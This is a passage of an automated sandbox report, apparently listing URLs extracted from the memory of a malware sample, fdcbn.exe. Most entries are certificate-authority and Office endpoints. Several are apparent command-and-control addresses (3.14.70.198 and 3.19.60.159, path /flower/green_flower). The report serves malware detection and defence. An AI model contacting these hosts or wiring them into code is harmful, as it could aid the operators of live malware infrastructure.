Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.accv.es00
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.anf.es
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	String found in binary or memory: http://www.dsquery.dll
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.eme.lv/repository0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.oaticerts.com/repository.
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.rcsc.lt/repository0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://%s.pinrules.crt/%sendTraceLogca1.3.6.1.4.1.311.10.8.11.3.6.1.4.1.311.10.11.1.3.6.1.4.1.311.1
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/P
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/X
Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	String found in binary or memory: https://192.168.0.1/flower/green_flower
Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/flower/green_flowerG
Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/flower/green_flowers
Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/h
Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/ings
Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	String found in binary or memory: https://192.168.0.1/ingsLMEM8
Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/lower/green_flower
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/p
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://192.168.0.1/x
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500266048.000001DEEECE6000.00000004.00000020.sdmp	String found in binary or memory: https://3.14.70.198/
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/6
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/H
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/P
Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp, fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/flower/green_flower
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/flower/green_flowerj
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/flower/green_flower~
Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.14.70.198/ings
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/
Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/$
Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flower
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flower;
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flowerj
Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flowerl
Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flowerm32
Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	String found in binary or memory: https://3.19.60.159/flower/green_flowern
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.office.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://augloop.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cdn.entity.
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cortana.ai
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://cr.office.com
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://directory.services.
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://eca.hinet.net/repository0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
